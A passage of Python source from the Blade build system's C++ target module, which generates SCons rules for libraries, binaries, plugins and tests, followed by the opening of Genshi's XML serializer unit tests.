optimize,
extra_cppflags,
extra_linkflags,
blade,
kwargs):
"""Init method.
Init the cc target.
"""
srcs = var_to_list(srcs)
deps = var_to_list(deps)
defs = var_to_list(defs)
incs = var_to_list(incs)
export_incs = var_to_list(export_incs)
opt = var_to_list(optimize)
extra_cppflags = var_to_list(extra_cppflags)
extra_linkflags = var_to_list(extra_linkflags)
Target.__init__(self,
name,
target_type,
srcs,
deps,
visibility,
blade,
kwargs)
self.data['warning'] = warning
self.data['defs'] = defs
self.data['incs'] = incs
self.data['export_incs'] = export_incs
self.data['optimize'] = opt
self.data['extra_cppflags'] = extra_cppflags
self.data['extra_linkflags'] = extra_linkflags
self._check_defs()
self._check_incorrect_no_warning()
def _check_deprecated_deps(self):
"""Check whether it depends upon a deprecated library. """
for key in self.deps:
dep = self.target_database.get(key)
if dep and dep.data.get('deprecated'):
replaced_deps = dep.deps
if replaced_deps:
console.warning('%s: //%s has been deprecated, '
'please depends on //%s:%s' % (
self.fullname, dep.fullname,
replaced_deps[0][0], replaced_deps[0][1]))
def _prepare_to_generate_rule(self):
"""Should be overridden. """
self._check_deprecated_deps()
self._clone_env()
def _clone_env(self):
"""Select env. """
env_name = self._env_name()
warning = self.data.get('warning', '')
if warning == 'yes':
self._write_rule('%s = env_with_error.Clone()' % env_name)
else:
self._write_rule('%s = env_no_warning.Clone()' % env_name)
__cxx_keyword_list = frozenset([
'and', 'and_eq', 'alignas', 'alignof', 'asm', 'auto',
'bitand', 'bitor', 'bool', 'break', 'case', 'catch',
'char', 'char16_t', 'char32_t', 'class', 'compl', 'const',
'constexpr', 'const_cast', 'continue', 'decltype', 'default',
'delete', 'double', 'dynamic_cast', 'else', 'enum',
'explicit', 'export', 'extern', 'false', 'float', 'for',
'friend', 'goto', 'if', 'inline', 'int', 'long', 'mutable',
'namespace', 'new', 'noexcept', 'not', 'not_eq', 'nullptr',
'operator', 'or', 'or_eq', 'private', 'protected', 'public',
'register', 'reinterpret_cast', 'return', 'short', 'signed',
'sizeof', 'static', 'static_assert', 'static_cast', 'struct',
'switch', 'template', 'this', 'thread_local', 'throw',
'true', 'try', 'typedef', 'typeid', 'typename', 'union',
'unsigned', 'using', 'virtual', 'void', 'volatile', 'wchar_t',
'while', 'xor', 'xor_eq'])
def _check_defs(self):
"""_check_defs.
It will warn if user defines cpp keyword in defs list.
"""
defs_list = self.data.get('defs', [])
for macro in defs_list:
pos = macro.find('=')
if pos != -1:
macro = macro[0:pos]
if macro in CcTarget.__cxx_keyword_list:
console.warning('DO NOT define c++ keyword %s as macro' % macro)
def _check_incorrect_no_warning(self):
"""check if warning=no is correctly used or not. """
warning = self.data.get('warning', 'yes')
srcs = self.srcs
if not srcs or warning != 'no':
return
keywords_list = self.blade.get_sources_keyword_list()
for keyword in keywords_list:
if keyword in self.path:
return
illegal_path_list = []
for keyword in keywords_list:
illegal_path_list += [s for s in srcs if not keyword in s]
if illegal_path_list:
console.warning("//%s:%s : warning='no' is only allowed "
"for code in thirdparty." % (
self.key[0], self.key[1]))
def _objs_name(self):
"""_objs_name.
Concatenating target path, target name to be objs var and returns.
"""
return 'objs_%s' % self._generate_variable_name(self.path, self.name)
def _prebuilt_cc_library_path(self, prefer_dynamic=False):
"""
Return source and target path of the prebuilt cc library.
When both .so and .a exist, return .so if prefer_dynamic is True.
Otherwise return the existing one.
"""
a_src_path = self._prebuilt_cc_library_pathname(dynamic=False)
so_src_path = self._prebuilt_cc_library_pathname(dynamic=True)
libs = (a_src_path, so_src_path) # Ordered by priority
if prefer_dynamic:
libs = (so_src_path, a_src_path)
source = ''
for lib in libs:
if os.path.exists(lib):
source = lib
break
if not source:
console.error_exit('%s: Can not find either %s or %s' % (
self.fullname, libs[0], libs[1]))
target = self._target_file_path(os.path.basename(source))
return source, target
def _prebuilt_cc_library_pathname(self, dynamic=False):
options = self.blade.get_options()
suffix = 'a'
if dynamic:
suffix = 'so'
return os.path.join(self.path, 'lib%s_%s' % (options.m, options.profile),
'lib%s.%s' % (self.name, suffix))
def _prebuilt_cc_library_dynamic_soname(self, so):
"""Get the soname of prebuilt shared library. """
soname = None
output = subprocess.check_output('objdump -p %s' % so, shell=True)
for line in output.splitlines():
parts = line.split()
if len(parts) == 2 and parts[0] == 'SONAME':
soname = parts[1]
break
return soname
def _setup_cc_flags(self):
"""_setup_cc_flags. """
env_name = self._env_name()
flags_from_option, incs_list = self._get_cc_flags()
if flags_from_option:
self._write_rule('%s.Append(CPPFLAGS=%s)' % (env_name, flags_from_option))
if incs_list:
self._write_rule('%s.Append(CPPPATH=%s)' % (env_name, incs_list))
def _setup_as_flags(self):
"""_setup_as_flags. """
env_name = self._env_name()
as_flags, aspp_flags = self._get_as_flags()
if as_flags:
self._write_rule('%s.Append(ASFLAGS=%s)' % (env_name, as_flags))
if aspp_flags:
self._write_rule('%s.Append(ASPPFLAGS=%s)' % (env_name, aspp_flags))
def _setup_link_flags(self):
"""linkflags. """
extra_linkflags = self.data.get('extra_linkflags')
if extra_linkflags:
self._write_rule('%s.Append(LINKFLAGS=%s)' % (self._env_name(), extra_linkflags))
def _get_optimize_flags(self):
"""get optimize flags such as -O2"""
oflags = []
opt_list = self.data.get('optimize')
if not opt_list:
cc_config = configparse.blade_config.get_config('cc_config')
opt_list = cc_config['optimize']
if opt_list:
for flag in opt_list:
if flag.startswith('-'):
oflags.append(flag)
else:
oflags.append('-' + flag)
else:
oflags = ['-O2']
return oflags
def _get_cc_flags(self):
"""_get_cc_flags.
Return the cpp flags according to the BUILD file and other configs.
"""
cpp_flags = []
# Warnings
if self.data.get('warning', '') == 'no':
cpp_flags.append('-w')
# Defs
defs = self.data.get('defs', [])
cpp_flags += [('-D' + macro) for macro in defs]
# Optimize flags
if (self.blade.get_options().profile == 'release' or
self.data.get('always_optimize')):
cpp_flags += self._get_optimize_flags()
# Add -fno-omit-frame-pointer to optimize mode for easy debugging.
cpp_flags += ['-fno-omit-frame-pointer']
cpp_flags += self.data.get('extra_cppflags', [])
# Incs
incs = self.data.get('incs', []) + self.data.get('export_incs', [])
incs = [os.path.normpath(os.path.join(self.path, inc)) for inc in incs]
incs += self._export_incs_list()
# Remove duplicate items in incs list and keep the order
incs = stable_unique(incs)
return (cpp_flags, incs)
def _get_as_flags(self):
"""_get_as_flags.
Return the as flags according to the build architecture.
"""
options = self.blade.get_options()
as_flags = ['-g', '--' + options.m]
aspp_flags = ['-Wa,--' + options.m]
return as_flags, aspp_flags
def _export_incs_list(self):
"""_export_incs_list.
TODO
"""
deps = self.expanded_deps
inc_list = []
for lib in deps:
# system lib
if lib[0] == '#':
continue
target = self.target_database[lib]
for inc in target.data.get('export_incs', []):
path = os.path.normpath(os.path.join(target.path, inc))
inc_list.append(path)
return inc_list
def _static_deps_list(self):
"""_static_deps_list.
Returns
-----------
link_all_symbols_lib_list: the libs to link all its symbols into target
lib_list: the libs list to be statically linked into static library
Description
-----------
It will find the libs needed to be linked into the target statically.
"""
build_targets = self.blade.get_build_targets()
lib_list = []
link_all_symbols_lib_list = []
for dep in self.expanded_deps:
dep_target = build_targets[dep]
if dep_target.type == 'cc_library' and not dep_target.srcs:
continue
# system lib
if dep_target.type == 'system_library':
lib_name = "'%s'" % dep_target.name
else:
lib_name = dep_target.data.get('static_cc_library_var')
if lib_name:
if dep_target.data.get('link_all_symbols'):
link_all_symbols_lib_list.append(lib_name)
else:
lib_list.append(lib_name)
return (link_all_symbols_lib_list, lib_list)
def _dynamic_deps_list(self):
"""_dynamic_deps_list.
Returns
-----------
lib_list: the libs list to be dynamically linked into dynamic library
Description
-----------
It will find the libs needed to be linked into the target dynamically.
"""
build_targets = self.blade.get_build_targets()
lib_list = []
for lib in self.expanded_deps:
dep_target = build_targets[lib]
if (dep_target.type == 'cc_library' and
not dep_target.srcs):
continue
# system lib
if lib[0] == '#':
lib_name = "'%s'" % lib[1]
else:
lib_name = dep_target.data.get('dynamic_cc_library_var')
if lib_name:
lib_list.append(lib_name)
return lib_list
def _get_static_deps_lib_list(self):
"""Returns a tuple that needed to write static deps rules. """
(link_all_symbols_lib_list, lib_list) = self._static_deps_list()
lib_str = 'LIBS=[%s]' % ','.join(lib_list)
whole_link_flags = []
if link_all_symbols_lib_list:
whole_link_flags = ['"-Wl,--whole-archive"']
for i in link_all_symbols_lib_list:
whole_link_flags.append(i)
whole_link_flags.append('"-Wl,--no-whole-archive"')
return (link_all_symbols_lib_list, lib_str, ', '.join(whole_link_flags))
def _get_dynamic_deps_lib_list(self):
"""Returns the libs string. """
lib_list = self._dynamic_deps_list()
return 'LIBS=[%s]' % ','.join(lib_list)
def _prebuilt_cc_library_is_depended(self):
build_targets = self.blade.get_build_targets()
for key in build_targets:
target = build_targets[key]
if (self.key in target.expanded_deps and
target.type != 'prebuilt_cc_library'):
return True
return False
def _prebuilt_cc_library_rules(self, var_name, target, source):
"""Generate scons rules for prebuilt cc library. """
if source.endswith('.a'):
self._write_rule('%s = top_env.File("%s")' % (var_name, source))
else:
self._write_rule('%s = top_env.Command("%s", "%s", '
'Copy("$TARGET", "$SOURCE"))' % (
var_name, target, source))
def _prebuilt_cc_library(self):
"""Prebuilt cc library rules. """
# We allow a prebuilt cc_library doesn't exist if it is not used.
# So if this library is not depended by any target, don't generate any
# rule to avoid runtime error and also avoid unnecessary runtime cost.
if not self._prebuilt_cc_library_is_depended():
return
# Paths for static linking, may be a dynamic library!
static_src_path, static_target_path = self._prebuilt_cc_library_path()
var_name = self._var_name()
self._prebuilt_cc_library_rules(var_name, static_target_path, static_src_path)
self.data['static_cc_library_var'] = var_name
dynamic_src_path, dynamic_target_path = '', ''
if self._need_dynamic_library():
dynamic_src_path, dynamic_target_path = self._prebuilt_cc_library_path(
prefer_dynamic=True)
# Avoid copy twice if has only one kind of library
if dynamic_target_path != static_target_path:
var_name = self._var_name('dynamic')
self._prebuilt_cc_library_rules(var_name,
dynamic_target_path,
dynamic_src_path)
self.data['dynamic_cc_library_var'] = var_name
# Make a symbol link if either lib is a so
self.file_and_link = None
so_src, so_target = '', ''
if static_target_path.endswith('.so'):
so_src = static_src_path
so_target = static_target_path
elif dynamic_target_path.endswith('.so'):
so_src = dynamic_src_path
so_target = dynamic_target_path
if so_src:
soname = self._prebuilt_cc_library_dynamic_soname(so_src)
if soname:
self.file_and_link = (so_target, soname)
def _static_cc_library(self):
"""_cc_library.
It will output the cc_library rule into the buffer.
"""
env_name = self._env_name()
var_name = self._var_name()
self._write_rule('%s = %s.Library("%s", %s)' % (
var_name,
env_name,
self._target_file_path(),
self._objs_name()))
self.data['static_cc_library_var'] = var_name
self._add_default_target_var('a', var_name)
def _dynamic_cc_library(self):
"""_dynamic_cc_library.
It will output the dynamic_cc_library rule into the buffer.
"""
self._setup_link_flags()
var_name = self._var_name('dynamic')
env_name = self._env_name()
lib_str = self._get_dynamic_deps_lib_list()
if self.srcs or self.expanded_deps:
if not self.data.get('allow_undefined'):
self._write_rule('%s.Append(LINKFLAGS=["-Xlinker", "--no-undefined"])'
% env_name)
self._write_rule('%s = %s.SharedLibrary("%s", %s, %s)' % (
var_name,
env_name,
self._target_file_path(),
self._objs_name(),
lib_str))
self.data['dynamic_cc_library_var'] = var_name
self._add_target_var('so', var_name)
def _need_dynamic_library(self):
options = self.blade.get_options()
config = configparse.blade_config.get_config('cc_library_config')
return (getattr(options, 'generate_dynamic') or
self.data.get('build_dynamic') or
config.get('generate_dynamic'))
def _cc_library(self):
self._static_cc_library()
if self._need_dynamic_library():
self._dynamic_cc_library()
def _generate_generated_header_files_depends(self, var_name):
"""Generate dependencies to targets that generate header files. """
env_name = self._env_name()
q = Queue.Queue(0)
for key in self.deps:
q.put(key)
keys = set()
while not q.empty():
key = q.get()
if key not in keys:
keys.add(key)
dep = self.target_database[key]
if dep._generate_header_files():
if dep.srcs:
self._write_rule('%s.Depends(%s, %s)' % (
env_name, var_name, dep._var_name()))
else:
for k in dep.deps:
q.put(k)
def _cc_objects_rules(self):
"""_cc_objects_rules.
Generate the cc objects rules for the srcs in srcs list.
"""
target_types = ['cc_library',
'cc_binary',
'cc_test',
'cc_plugin']
if not self.type in target_types:
console.error_exit('logic error, type %s err in object rule' % self.type)
objs_name = self._objs_name()
env_name = self._env_name()
self._setup_cc_flags()
objs = []
for src in self.srcs:
obj = '%s_%s_object' % (self._var_name_of(src),
self._regular_variable_name(self.name))
target_path = self._target_file_path() + '.objs/%s' % src
source_path = self._target_file_path(src) # Also find generated files
rule_args = ('target = "%s" + top_env["OBJSUFFIX"], source = "%s"' %
(target_path, source_path))
if self.data.get('secure'):
rule_args += ', CXX = "$SECURECXX"'
self._write_rule('%s = %s.SharedObject(%s)' % (obj, env_name, rule_args))
if self.data.get('secure'):
self._securecc_object_rules(obj, source_path)
objs.append(obj)
self._write_rule('%s = [%s]' % (objs_name, ','.join(objs)))
self._generate_generated_header_files_depends(objs_name)
if objs:
objs_dirname = self._target_file_path() + '.objs'
self._write_rule('%s.Clean([%s], "%s")' % (env_name, objs_name, objs_dirname))
def _securecc_object_rules(self, obj, src):
"""Touch the source file if needed and generate specific object rules for securecc. """
env_name = self._env_name()
self._write_rule('%s.AlwaysBuild(%s)' % (env_name, obj))
if not os.path.exists(src):
dir = os.path.dirname(src)
if not os.path.isdir(dir):
os.makedirs(dir)
open(src, 'w').close()
class CcLibrary(CcTarget):
"""A cc target subclass.
This class is derived from SconsTarget and it generates the library
rules including dynamic library rules according to user option.
"""
def __init__(self,
name,
srcs,
deps,
visibility,
warning,
defs,
incs,
export_incs,
optimize,
always_optimize,
prebuilt,
link_all_symbols,
deprecated,
extra_cppflags,
extra_linkflags,
allow_undefined,
secure,
blade,
kwargs):
"""Init method.
Init the cc library.
"""
CcTarget.__init__(self,
name,
'cc_library',
srcs,
deps,
visibility,
warning,
defs,
incs,
export_incs,
optimize,
extra_cppflags,
extra_linkflags,
blade,
kwargs)
if prebuilt:
self.type = 'prebuilt_cc_library'
self.srcs = []
self.data['link_all_symbols'] = link_all_symbols
self.data['always_optimize'] = always_optimize
self.data['deprecated'] = deprecated
self.data['allow_undefined'] = allow_undefined
self.data['secure'] = secure
def _rpath_link(self, dynamic):
path = self._prebuilt_cc_library_path(dynamic)[1]
if path.endswith('.so'):
return os.path.dirname(path)
return None
def scons_rules(self):
"""scons_rules.
It outputs the scons rules according to user options.
"""
if self.type == 'prebuilt_cc_library':
self._check_deprecated_deps()
self._prebuilt_cc_library()
elif self.srcs:
self._prepare_to_generate_rule()
self._cc_objects_rules()
self._cc_library()
def cc_library(name,
srcs=[],
deps=[],
visibility=None,
warning='yes',
defs=[],
incs=[],
export_incs=[],
optimize=[],
always_optimize=False,
pre_build=False,
prebuilt=False,
link_all_symbols=False,
deprecated=False,
extra_cppflags=[],
extra_linkflags=[],
allow_undefined=False,
secure=False,
**kwargs):
"""cc_library target. """
target = CcLibrary(name,
srcs,
deps,
visibility,
warning,
defs,
incs,
export_incs,
optimize,
always_optimize,
prebuilt or pre_build,
link_all_symbols,
deprecated,
extra_cppflags,
extra_linkflags,
allow_undefined,
secure,
blade.blade,
kwargs)
if pre_build:
console.warning("//%s:%s: 'pre_build' has been deprecated, "
"please use 'prebuilt'" % (target.path, target.name))
blade.blade.register_target(target)
build_rules.register_function(cc_library)
class CcBinary(CcTarget):
"""A scons cc target subclass.
This class is derived from SconsCCTarget and it generates the cc_binary
rules according to user options.
"""
def __init__(self,
name,
srcs,
deps,
warning,
defs,
incs,
embed_version,
optimize,
dynamic_link,
extra_cppflags,
extra_linkflags,
export_dynamic,
blade,
kwargs):
"""Init method.
Init the cc binary.
"""
CcTarget.__init__(self,
name,
'cc_binary',
srcs,
deps,
None,
warning,
defs,
incs,
[],
optimize,
extra_cppflags,
extra_linkflags,
blade,
kwargs)
self.data['embed_version'] = embed_version
self.data['dynamic_link'] = dynamic_link
self.data['export_dynamic'] = export_dynamic
cc_binary_config = configparse.blade_config.get_config('cc_binary_config')
# add extra link library
link_libs = var_to_list(cc_binary_config['extra_libs'])
self._add_hardcode_library(link_libs)
def _allow_duplicate_source(self):
return True
def _get_rpath_links(self):
"""Get rpath_links from dependencies"""
dynamic_link = self.data['dynamic_link']
build_targets = self.blade.get_build_targets()
rpath_links = []
for lib in self.expanded_deps:
if build_targets[lib].type == 'prebuilt_cc_library':
path = build_targets[lib]._rpath_link(dynamic_link)
if path and path not in rpath_links:
rpath_links.append(path)
return rpath_links
def _write_rpath_links(self):
rpath_links = self._get_rpath_links()
if rpath_links:
for rpath_link in rpath_links:
self._write_rule('%s.Append(LINKFLAGS="-Wl,--rpath-link=%s")' %
(self._env_name(), rpath_link))
def _cc_binary(self):
"""_cc_binary rules. """
env_name = self._env_name()
var_name = self._var_name()
platform = self.blade.get_scons_platform()
if platform.get_gcc_version() > '4.5':
link_flag_list = ['-static-libgcc', '-static-libstdc++']
self._write_rule('%s.Append(LINKFLAGS=%s)' % (env_name, link_flag_list))
(link_all_symbols_lib_list,
lib_str,
whole_link_flags) = self._get_static_deps_lib_list()
if whole_link_flags:
self._write_rule(
'%s.Append(LINKFLAGS=[%s])' % (env_name, whole_link_flags))
if self.data.get('export_dynamic'):
self._write_rule(
'%s.Append(LINKFLAGS="-rdynamic")' % env_name)
self._setup_link_flags()
self._write_rule('%s = %s.Program("%s", %s, %s)' % (
var_name,
env_name,
self._target_file_path(),
self._objs_name(),
lib_str))
self._add_default_target_var('bin', var_name)
if link_all_symbols_lib_list:
self._write_rule('%s.Depends(%s, [%s])' % (
env_name, var_name, ', '.join(link_all_symbols_lib_list)))
self._write_rpath_links()
if self.data['embed_version']:
self._write_rule('%s.Append(LINKFLAGS=str(version_obj[0]))' % env_name)
self._write_rule('%s.Requires(%s, version_obj)' % (env_name, var_name))
def _dynamic_cc_binary(self):
"""_dynamic_cc_binary. """
env_name = self._env_name()
var_name = self._var_name()
if self.data.get('export_dynamic'):
self._write_rule('%s.Append(LINKFLAGS="-rdynamic")' % env_name)
self._setup_link_flags()
lib_str = self._get_dynamic_deps_lib_list()
self._write_rule('%s = %s.Program("%s", %s, %s)' % (
var_name,
env_name,
self._target_file_path(),
self._objs_name(),
lib_str))
self._add_default_target_var('bin', var_name)
if self.data['embed_version']:
self._write_rule('%s.Append(LINKFLAGS=str(version_obj[0]))' % env_name)
self._write_rule('%s.Requires(%s, version_obj)' % (env_name, var_name))
self._write_rpath_links()
def scons_rules(self):
"""scons_rules.
It outputs the scons rules according to user options.
"""
self._prepare_to_generate_rule()
self._cc_objects_rules()
if self.data['dynamic_link']:
self._dynamic_cc_binary()
else:
self._cc_binary()
def cc_binary(name,
srcs=[],
deps=[],
warning='yes',
defs=[],
incs=[],
embed_version=True,
optimize=[],
dynamic_link=False,
extra_cppflags=[],
extra_linkflags=[],
export_dynamic=False,
**kwargs):
"""cc_binary target. """
cc_binary_target = CcBinary(name,
srcs,
deps,
warning,
defs,
incs,
embed_version,
optimize,
dynamic_link,
extra_cppflags,
extra_linkflags,
export_dynamic,
blade.blade,
kwargs)
blade.blade.register_target(cc_binary_target)
build_rules.register_function(cc_binary)
def cc_benchmark(name, deps=[], **kwargs):
"""cc_benchmark target. """
cc_config = configparse.blade_config.get_config('cc_config')
benchmark_libs = cc_config['benchmark_libs']
benchmark_main_libs = cc_config['benchmark_main_libs']
deps = var_to_list(deps) + benchmark_libs + benchmark_main_libs
cc_binary(name=name, deps=deps, **kwargs)
build_rules.register_function(cc_benchmark)
class CcPlugin(CcTarget):
"""A scons cc target subclass.
This class is derived from SconsCCTarget and it generates the cc_plugin
rules according to user options.
"""
def __init__(self,
name,
srcs,
deps,
warning,
defs,
incs,
optimize,
prefix,
suffix,
extra_cppflags,
extra_linkflags,
allow_undefined,
blade,
kwargs):
"""Init method.
Init the cc plugin target.
"""
CcTarget.__init__(self,
name,
'cc_plugin',
srcs,
deps,
None,
warning,
defs,
incs,
[],
optimize,
extra_cppflags,
extra_linkflags,
blade,
kwargs)
self.prefix = prefix
self.suffix = suffix
self.data['allow_undefined'] = allow_undefined
def scons_rules(self):
"""scons_rules.
It outputs the scons rules according to user options.
"""
self._prepare_to_generate_rule()
env_name = self._env_name()
var_name = self._var_name()
self._cc_objects_rules()
self._setup_link_flags()
(link_all_symbols_lib_list,
lib_str,
whole_link_flags) = self._get_static_deps_lib_list()
if whole_link_flags:
self._write_rule(
'%s.Append(LINKFLAGS=[%s])' % (env_name, whole_link_flags))
if self.prefix is not None:
self._write_rule(
'%s.Replace(SHLIBPREFIX="%s")' % (env_name, self.prefix))
if self.suffix is not None:
self._write_rule(
'%s.Replace(SHLIBSUFFIX="%s")' % (env_name, self.suffix))
if not self.data['allow_undefined']:
self._write_rule('%s.Append(LINKFLAGS=["-Xlinker", "--no-undefined"])'
% env_name)
if self.srcs or self.expanded_deps:
self._write_rule('%s = %s.SharedLibrary("%s", %s, %s)' % (
var_name,
env_name,
self._target_file_path(),
self._objs_name(),
lib_str))
self._add_default_target_var('so', var_name)
if link_all_symbols_lib_list:
self._write_rule('%s.Depends(%s, [%s])' % (
env_name, var_name, ', '.join(link_all_symbols_lib_list)))
def cc_plugin(name,
srcs=[],
deps=[],
warning='yes',
defs=[],
incs=[],
optimize=[],
prefix=None,
suffix=None,
extra_cppflags=[],
extra_linkflags=[],
allow_undefined=True,
**kwargs):
"""cc_plugin target. """
target = CcPlugin(name,
srcs,
deps,
warning,
defs,
incs,
optimize,
prefix,
suffix,
extra_cppflags,
extra_linkflags,
allow_undefined,
blade.blade,
kwargs)
blade.blade.register_target(target)
build_rules.register_function(cc_plugin)
# See http://google-perftools.googlecode.com/svn/trunk/doc/heap_checker.html
HEAP_CHECK_VALUES = set([
'',
'minimal',
'normal',
'strict',
'draconian',
'as-is',
'local',
])
class CcTest(CcBinary):
"""A scons cc target subclass.
This class is derived from SconsCCTarget and it generates the cc_test
rules according to user options.
"""
def __init__(self,
name,
srcs,
deps,
warning,
defs,
incs,
embed_version,
optimize,
dynamic_link,
testdata,
extra_cppflags,
extra_linkflags,
export_dynamic,
always_run,
exclusive,
heap_check,
heap_check_debug,
blade,
kwargs):
"""Init method.
Init the cc test.
"""
cc_test_config = configparse.blade_config.get_config('cc_test_config')
if dynamic_link is None:
dynamic_link = cc_test_config['dynamic_link']
CcBinary.__init__(self,
name,
srcs,
deps,
warning,
defs,
incs,
embed_version,
optimize,
dynamic_link,
extra_cppflags,
extra_linkflags,
export_dynamic,
blade,
kwargs)
self.type = 'cc_test'
self.data['testdata'] = var_to_list(testdata)
self.data['always_run'] = always_run
self.data['exclusive'] = exclusive
gtest_lib = var_to_list(cc_test_config['gtest_libs'])
gtest_main_lib = var_to_list(cc_test_config['gtest_main_libs'])
# Hardcode deps rule to thirdparty gtest main lib.
self._add_hardcode_library(gtest_lib)
self._add_hardcode_library(gtest_main_lib)
if heap_check is None:
heap_check = cc_test_config.get('heap_check', '')
else:
if heap_check not in HEAP_CHECK_VALUES:
console.error_exit('//%s:%s: heap_check can only be in %s' % (
self.path, self.name, HEAP_CHECK_VALUES))
perftools_lib = var_to_list(cc_test_config['gperftools_libs'])
perftools_debug_lib = var_to_list(cc_test_config['gperftools_debug_libs'])
if heap_check:
self.data['heap_check'] = heap_check
if heap_check_debug:
perftools_lib_list = perftools_debug_lib
else:
perftools_lib_list = perftools_lib
self._add_hardcode_library(perftools_lib_list)
def cc_test(name,
srcs=[],
deps=[],
warning='yes',
defs=[],
incs=[],
embed_version=False,
optimize=[],
dynamic_link=None,
testdata=[],
extra_cppflags=[],
extra_linkflags=[],
export_dynamic=False,
always_run=False,
exclusive=False,
heap_check=None,
heap_check_debug=False,
**kwargs):
"""cc_test target. """
cc_test_target = CcTest(name,
srcs,
deps,
warning,
defs,
incs,
embed_version,
optimize,
dynamic_link,
testdata,
extra_cppflags,
extra_linkflags,
export_dynamic,
always_run,
exclusive,
heap_check,
heap_check_debug,
blade.blade,
kwargs)
blade.blade.register_target(cc_test_target)
build_rules.register_function(cc_test)
| project-zerus/blade | src/blade/cc_targets.py | Python | bsd-3-clause | 39,092 |
# -*- coding: utf-8 -*-
#
# Copyright (C) 2006-2008 Edgewall Software
# All rights reserved.
#
# This software is licensed as described in the file COPYING, which
# you should have received as part of this distribution. The terms
# are also available at http://genshi.edgewall.org/wiki/License.
#
# This software consists of voluntary contributions made by many
# individuals. For the exact contribution history, see the revision
# history and logs, available at http://genshi.edgewall.org/log/.
import doctest
import unittest
import sys
from genshi.core import Attrs, Stream, QName
from genshi.input import HTML, XML
from genshi.output import DocType, XMLSerializer, XHTMLSerializer, \
HTMLSerializer, EmptyTagFilter
class XMLSerializerTestCase(unittest.TestCase):
def test_with_xml_decl(self):
stream = Stream([(Stream.XML_DECL, ('1.0', None, -1), (None, -1, -1))])
output = stream.render(XMLSerializer, doctype='xhtml', encoding=None)
self.assertEqual('<?xml version="1.0"?>\n'
'<!DOCTYPE html PUBLIC '
'"-//W3C//DTD XHTML 1.0 Strict//EN" '
'"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">\n',
output)
def test_doctype_in_stream(self):
stream = Stream([(Stream.DOCTYPE, DocType.HTML_STRICT, (None, -1, -1))])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual('<!DOCTYPE html PUBLIC '
'"-//W3C//DTD HTML 4.01//EN" '
'"http://www.w3.org/TR/html4/strict.dtd">\n',
output)
def test_doctype_in_stream_no_sysid(self):
stream = Stream([(Stream.DOCTYPE,
('html', '-//W3C//DTD HTML 4.01//EN', None),
(None, -1, -1))])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual('<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN">\n',
output)
def test_doctype_in_stream_no_pubid(self):
stream = Stream([
(Stream.DOCTYPE,
('html', None, 'http://www.w3.org/TR/html4/strict.dtd'),
(None, -1, -1))
])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual('<!DOCTYPE html SYSTEM '
'"http://www.w3.org/TR/html4/strict.dtd">\n',
output)
def test_doctype_in_stream_no_pubid_or_sysid(self):
stream = Stream([(Stream.DOCTYPE, ('html', None, None),
(None, -1, -1))])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual('<!DOCTYPE html>\n', output)
def test_serializer_doctype(self):
stream = Stream([])
output = stream.render(XMLSerializer, doctype=DocType.HTML_STRICT,
encoding=None)
self.assertEqual('<!DOCTYPE html PUBLIC '
'"-//W3C//DTD HTML 4.01//EN" '
'"http://www.w3.org/TR/html4/strict.dtd">\n',
output)
def test_doctype_one_and_only(self):
stream = Stream([
(Stream.DOCTYPE, ('html', None, None), (None, -1, -1))
])
output = stream.render(XMLSerializer, doctype=DocType.HTML_STRICT,
encoding=None)
self.assertEqual('<!DOCTYPE html PUBLIC '
'"-//W3C//DTD HTML 4.01//EN" '
'"http://www.w3.org/TR/html4/strict.dtd">\n',
output)
def test_comment(self):
stream = Stream([(Stream.COMMENT, 'foo bar', (None, -1, -1))])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual('<!--foo bar-->', output)
def test_processing_instruction(self):
stream = Stream([(Stream.PI, ('python', 'x = 2'), (None, -1, -1))])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual('<?python x = 2?>', output)
def test_nested_default_namespaces(self):
stream = Stream([
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}div'), Attrs()), (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.END, QName('http://example.org/}div'), (None, -1, -1)),
(Stream.END_NS, '', (None, -1, -1))
])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual("""<div xmlns="http://example.org/">
<p/>
<p/>
</div>""", output)
def test_nested_bound_namespaces(self):
stream = Stream([
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}div'), Attrs()), (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('x', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.END, QName('http://example.org/}div'), (None, -1, -1)),
(Stream.END_NS, 'x', (None, -1, -1))
])
output = stream.render(XMLSerializer, encoding=None)
self.assertEqual("""<x:div xmlns:x="http://example.org/">
<x:p/>
<x:p/>
</x:div>""", output)
def test_multiple_default_namespaces(self):
stream = Stream([
(Stream.START, (QName('div'), Attrs()), (None, -1, -1)),
(Stream.TEXT, '\n ', (None, -1, -1)),
(Stream.START_NS, ('', 'http://example.org/'), (None, -1, -1)),
(Stream.START, (QName('http://example.org/}p'), Attrs()), (None, -1, -1)),
(Stream.END, QName('http://example.org/}p'), (None, -1, -1)),
